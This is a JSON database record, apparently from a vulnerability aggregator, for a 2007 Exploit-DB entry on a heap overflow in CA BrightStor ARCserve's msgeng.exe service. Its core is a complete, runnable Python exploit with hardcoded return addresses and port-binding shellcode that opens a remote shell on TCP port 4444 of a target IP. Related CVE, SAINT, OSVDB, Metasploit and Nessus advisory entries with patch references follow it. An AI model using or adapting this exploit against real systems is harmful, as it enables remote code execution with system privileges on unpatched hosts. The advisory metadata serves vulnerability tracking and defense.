{"bulletinFamily": "exploit", "id": "EDB-ID:3211", "cvelist": ["CVE-2007-0449"], "modified": "2007-01-27T00:00:00", "lastseen": "2016-01-31T17:58:26", "edition": 1, "sourceData": "#!/usr/bin/python\n# I couldnt find a reliable exploit for my analysis and so came up with this.\n# Remote exploit for the CA BrightStor msgeng.exe service heap overflow\n# vulnerability as described in LS-20060313.pdf on lssec.com. The exploit was\n# tested on windows 2000 SP0. Opens a shell on TCP port 4444. Shouldnt be hard\n# to port to other platforms. The exploit overwrites the\n# UnhandledExceptionFilter in windows 2000 SP0 (located at 77EE044C) with the\n# address of call dword ptr [esi +4C] located in user32.dll. At the time when\n# UEF is called esi +4C contains a pointer to our shellcode.\n#\n# Winny M Thomas ;-)\n# Author shall bear no responsibility for any screw ups caused by using this code\n\nfrom impacket.dcerpc import transport, dcerpc\nfrom impacket import uuid\nimport struct\nimport sys\n\ndef DCEconnectAndExploit(target):\n trans = transport.TCPTransport(target, 6503)\n trans.connect()\n dce = dcerpc.DCERPC_v5(trans)\n dce.bind(uuid.uuidtup_to_bin(('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0')))\n\n request = \"A\" * 676\n request += \"\\x90\\x90\\x90\\x90\"\n request += \"\\x90\\x90\\xeb\\x0a\"\n\n #Call dword ptr [esi +4C] from user32.dll\n request += struct.pack(\"<L\", 0x77E4FB7A)\n #Overwrite UnhandledExceptionFilter in Windows 2000 SP0\n request += struct.pack(\"<L\", 0x77EE044C)\n request += \"\\x90\\x90\\x90\\x90\" * 2\n #Portbinding shellcode; Opens shell on TCP port 4444\n request += \"\\x31\\xc9\\x83\\xe9\\xb0\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xe0\"\n request += \"\\x6f\\xe3\\x2a\\x83\\xeb\\xfc\\xe2\\xf4\\x1c\\x05\\x08\\x67\\x08\\x96\\x1c\\xd5\"\n request += \"\\x1f\\x0f\\x68\\x46\\xc4\\x4b\\x68\\x6f\\xdc\\xe4\\x9f\\x2f\\x98\\x6e\\x0c\\xa1\"\n request += \"\\xaf\\x77\\x68\\x75\\xc0\\x6e\\x08\\x63\\x6b\\x5b\\x68\\x2b\\x0e\\x5e\\x23\\xb3\"\n request += \"\\x4c\\xeb\\x23\\x5e\\xe7\\xae\\x29\\x27\\xe1\\xad\\x08\\xde\\xdb\\x3b\\xc7\\x02\"\n request += \"\\x95\\x8a\\x68\\x75\\xc4\\x6e\\x08\\x4c\\x6b\\x63\\xa8\\xa1\\xbf\\x73\\xe2\\xc1\"\n request += \"\\xe3\\x43\\x68\\xa3\\x8c\\x4b\\xff\\x4b\\x23\\x5e\\x38\\x4e\\x6b\\x2c\\xd3\\xa1\"\n request += \"\\xa0\\x63\\x68\\x5a\\xfc\\xc2\\x68\\x6a\\xe8\\x31\\x8b\\xa4\\xae\\x61\\x0f\\x7a\"\n request += \"\\x1f\\xb9\\x85\\x79\\x86\\x07\\xd0\\x18\\x88\\x18\\x90\\x18\\xbf\\x3b\\x1c\\xfa\"\n request += \"\\x88\\xa4\\x0e\\xd6\\xdb\\x3f\\x1c\\xfc\\xbf\\xe6\\x06\\x4c\\x61\\x82\\xeb\\x28\"\n request += \"\\xb5\\x05\\xe1\\xd5\\x30\\x07\\x3a\\x23\\x15\\xc2\\xb4\\xd5\\x36\\x3c\\xb0\\x79\"\n request += \"\\xb3\\x3c\\xa0\\x79\\xa3\\x3c\\x1c\\xfa\\x86\\x07\\xf2\\x76\\x86\\x3c\\x6a\\xcb\"\n request += \"\\x75\\x07\\x47\\x30\\x90\\xa8\\xb4\\xd5\\x36\\x05\\xf3\\x7b\\xb5\\x90\\x33\\x42\"\n request += \"\\x44\\xc2\\xcd\\xc3\\xb7\\x90\\x35\\x79\\xb5\\x90\\x33\\x42\\x05\\x26\\x65\\x63\"\n request += \"\\xb7\\x90\\x35\\x7a\\xb4\\x3b\\xb6\\xd5\\x30\\xfc\\x8b\\xcd\\x99\\xa9\\x9a\\x7d\"\n request += \"\\x1f\\xb9\\xb6\\xd5\\x30\\x09\\x89\\x4e\\x86\\x07\\x80\\x47\\x69\\x8a\\x89\\x7a\"\n request += \"\\xb9\\x46\\x2f\\xa3\\x07\\x05\\xa7\\xa3\\x02\\x5e\\x23\\xd9\\x4a\\x91\\xa1\\x07\"\n request += \"\\x1e\\x2d\\xcf\\xb9\\x6d\\x15\\xdb\\x81\\x4b\\xc4\\x8b\\x58\\x1e\\xdc\\xf5\\xd5\"\n request += \"\\x95\\x2b\\x1c\\xfc\\xbb\\x38\\xb1\\x7b\\xb1\\x3e\\x89\\x2b\\xb1\\x3e\\xb6\\x7b\"\n request += \"\\x1f\\xbf\\x8b\\x87\\x39\\x6a\\x2d\\x79\\x1f\\xb9\\x89\\xd5\\x1f\\x58\\x1c\\xfa\"\n request += \"\\x6b\\x38\\x1f\\xa9\\x24\\x0b\\x1c\\xfc\\xb2\\x90\\x33\\x42\\x10\\xe5\\xe7\\x75\"\n request += \"\\xb3\\x90\\x35\\xd5\\x30\\x6f\\xe3\\x2a\"\n\n dce.call(43, request)\n\nif __name__ == '__main__':\n try:\n target = sys.argv[1]\n except IndexError:\n print 'Usage: %s <target ip>\\n' % sys.argv[0]\n sys.exit(-1)\n\n DCEconnectAndExploit(target)\n\n# milw0rm.com [2007-01-27]\n", "published": "2007-01-27T00:00:00", "href": "https://www.exploit-db.com/exploits/3211/", "osvdbidlist": ["31593"], "reporter": "Winny Thomas", "hash": "2aca18a170d5fab7883597b2b7dce79ba9a324f6080607c3882a770142e729bb", "title": "CA BrightStor ARCserve msgeng.exe Remote Heap Overflow Exploit", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "CA BrightStor ARCserve (msgeng.exe) Remote Heap Overflow Exploit. CVE-2007-0449. Remote exploit for windows platform", "references": [], "cvss": {"score": 10, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/3211/", "enchantments": {"vulnersScore": 9.0}}

{"result": {"cve": [{"id": "CVE-2007-0449", "type": "cve", "title": "CVE-2007-0449", "description": "Multiple buffer overflows in LGSERVER.EXE in CA BrightStor ARCserve Backup for Laptops and Desktops r11.0 through r11.1 SP1, Mobile Backup r4.0, Desktop and Business Protection Suite r2, and Desktop Management Suite (DMS) r11.0 and r11.1 allow remote attackers to execute arbitrary code via crafted packets to TCP port (1) 1900 or (2) 2200.", "published": "2007-01-23T16:28:00", "cvss": {"score": 10, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0449", "cvelist": ["CVE-2007-0449"], "lastseen": "2016-09-03T08:19:33"}], "saint": [{"id": "SAINT:AC07CF401B0C02203F9F5BD5BA41706E", "type": "saint", "title": "BrightStor ARCserve LGServer buffer overflow", "description": "Added: 02/02/2007 \nCVE: [CVE-2007-0449](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0449>) \nBID: [22342](<http://www.securityfocus.com/bid/22342>) \nOSVDB: [31593](<http://www.osvdb.org/31593>) \n\n\n### Background\n\n[BrightStor ARCserve Backup for Laptops and Desktops](<http://www3.ca.com/smb/product.aspx?id=5286&culture=en-us>) is an automated backup solution optimized for low-bandwidth, intermittent network connections. \n\n### Problem\n\nA buffer overflow vulnerability in BrightStor ARCserve Backup for Laptops and Desktops allows remote attackers to execute arbitrary commands by sending a long request to the `**LGServer.exe**` process. \n\n### Resolution\n\nInstall one of the fixes referenced in the [Security Notice](<http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp>). \n\n### References\n\n<http://www3.ca.com/securityadvisor/vulninfo/Vuln.aspx?ID=34993> \n<http://www.securityfocus.com/archive/1/458648> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup for Laptops and Desktops r11.1. \n\n### Platforms\n\nWindows \n \n\n", "published": "2007-02-02T00:00:00", "cvss": {"score": 10, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_lgserver", "cvelist": ["CVE-2007-0449"], "lastseen": "2016-10-03T15:02:00"}, {"id": "SAINT:17867A60CC8CA6EA88789A5EEAB306FD", "type": "saint", "title": "BrightStor ARCserve LGServer buffer overflow", "description": "Added: 02/02/2007 \nCVE: [CVE-2007-0449](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0449>) \nBID: [22342](<http://www.securityfocus.com/bid/22342>) \nOSVDB: [31593](<http://www.osvdb.org/31593>) \n\n\n### Background\n\n[BrightStor ARCserve Backup for Laptops and Desktops](<http://www3.ca.com/smb/product.aspx?id=5286&culture=en-us>) is an automated backup solution optimized for low-bandwidth, intermittent network connections. \n\n### Problem\n\nA buffer overflow vulnerability in BrightStor ARCserve Backup for Laptops and Desktops allows remote attackers to execute arbitrary commands by sending a long request to the `**LGServer.exe**` process. \n\n### Resolution\n\nInstall one of the fixes referenced in the [Security Notice](<http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp>). \n\n### References\n\n<http://www3.ca.com/securityadvisor/vulninfo/Vuln.aspx?ID=34993> \n<http://www.securityfocus.com/archive/1/458648> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup for Laptops and Desktops r11.1. \n\n### Platforms\n\nWindows \n \n\n", "published": "2007-02-02T00:00:00", "cvss": {"score": 10, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_lgserver", "cvelist": ["CVE-2007-0449"], "lastseen": "2016-12-14T16:58:05"}, {"id": "SAINT:C246974F40EAE8BFB0C170267BC4B213", "type": "saint", "title": "BrightStor ARCserve LGServer buffer overflow", "description": "Added: 02/02/2007 \nCVE: [CVE-2007-0449](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0449>) \nBID: [22342](<http://www.securityfocus.com/bid/22342>) \nOSVDB: [31593](<http://www.osvdb.org/31593>) \n\n\n### Background\n\n[BrightStor ARCserve Backup for Laptops and Desktops](<http://www3.ca.com/smb/product.aspx?id=5286&culture=en-us>) is an automated backup solution optimized for low-bandwidth, intermittent network connections. \n\n### Problem\n\nA buffer overflow vulnerability in BrightStor ARCserve Backup for Laptops and Desktops allows remote attackers to execute arbitrary commands by sending a long request to the `**LGServer.exe**` process. \n\n### Resolution\n\nInstall one of the fixes referenced in the [Security Notice](<http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp>). \n\n### References\n\n<http://www3.ca.com/securityadvisor/vulninfo/Vuln.aspx?ID=34993> \n<http://www.securityfocus.com/archive/1/458648> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup for Laptops and Desktops r11.1. \n\n### Platforms\n\nWindows \n \n\n", "published": "2007-02-02T00:00:00", "cvss": {"score": 10, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_lgserver", "cvelist": ["CVE-2007-0449"], "lastseen": "2017-01-10T14:03:42"}], "osvdb": [{"id": "OSVDB:31593", "type": "osvdb", "title": "CA BrightStor ARCserve Backup Multiple Overflows", "description": "## Solution Description\nUpgrade to appropriate version recommended by the vendor or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor Specific News/Changelog Entry: http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp\nVendor Specific News/Changelog Entry: http://www3.ca.com/securityadvisor/newsinfo/collateral.aspx?cid=97696\n[Secunia Advisory ID:23897](https://secuniaresearch.flexerasoftware.com/advisories/23897/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0545.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0683.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0684.html\nISS X-Force ID: 31704\nFrSIRT Advisory: ADV-2007-0314\n[CVE-2007-0449](https://vulners.com/cve/CVE-2007-0449)\nCERT VU: 611276\nCERT VU: 357308\nBugtraq ID: 22342\nBugtraq ID: 22340\n", "published": "2007-01-23T00:00:00", "cvss": {"score": 10, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/osvdb/OSVDB:31593", "cvelist": ["CVE-2007-0449"], "lastseen": "2017-04-28T13:20:27"}], "exploitdb": [{"id": "EDB-ID:16400", "type": "exploitdb", "title": "CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow", "description": "CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow. CVE-2007-0449. Remote exploit for windows platform", "published": "2010-05-09T00:00:00", "cvss": {"score": 10, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/16400/", "cvelist": ["CVE-2007-0449"], "lastseen": "2016-02-01T23:47:04"}], "packetstorm": [{"id": "PACKETSTORM:83087", "type": "packetstorm", "title": "CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow", "description": "", "published": "2009-11-26T00:00:00", "cvss": {"score": 10, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/83087/CA-BrightStor-ARCserve-for-Laptops-Desktops-LGServer-Buffer-Overflow.html", "cvelist": ["CVE-2007-0449"], "lastseen": "2016-12-05T22:15:29"}], "seebug": [{"id": "SSV-70917", "type": "seebug", "title": "CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow", "description": "Summary: \nBrightStor ARCserve Backup for various platform server to provide backup and recovery protection function.< br/>BrightStor ARCserve Backup LGSERVER. EXE process in the processing of malformed requests when the existence of loopholes, remote attacker could exploit this vulnerability on the server to execute arbitrary commands. All sent to the TCP/2200 port on the mobile backup service process(LGSERVER.EXE)of the packet is\\x4e\\x3d\\x2c\\x1b sequence begins. If the packets sent in the\\x4e\\x3d\\x2c\\x1b after contains 65535 characters of the string, then it will cause the process to terminate; string overwrite heap memory can also lead to SYSTEM privileges to execute arbitrary instructions.\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 10, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.seebug.org/vuldb/ssvid-70917", "cvelist": ["CVE-2007-0449"], "lastseen": "2016-08-05T10:07:53"}], "metasploit": [{"id": "MSF:EXPLOIT/WINDOWS/BRIGHTSTOR/LGSERVER", "type": "metasploit", "title": "CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow", "description": "This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops &amp; Desktops 11.1. By sending a specially crafted request, an attacker could overflow the buffer and execute arbitrary code.", "published": "2007-02-04T01:58:50", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.rapid7.com/db/modules/exploit/windows/brightstor/lgserver", "cvelist": ["CVE-2007-0449"], "lastseen": "2017-07-02T23:57:43"}], "nessus": [{"id": "ARCSERVE_QO83833.NASL", "type": "nessus", "title": "CA BrightStor ARCserve Backup for Laptops & Desktops Server Multiple Vulnerabilities (QO83833)", "description": "According to its version, the installation of BrightStor ARCserve Backup for Laptops & Desktops Server on the remote host is affected by multiple buffer overflows and denial of service vulnerabilities that can be exploited by a remote attacker to execute arbitrary code on the affected host with LOCAL SYSTEM privileges or to crash the associated services.", "published": "2007-01-26T00:00:00", "cvss": {"score": 10, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=24240", "cvelist": ["CVE-2007-0449", "CVE-2007-0672", "CVE-2007-0673"], "lastseen": "2017-04-28T18:45:27"}]}}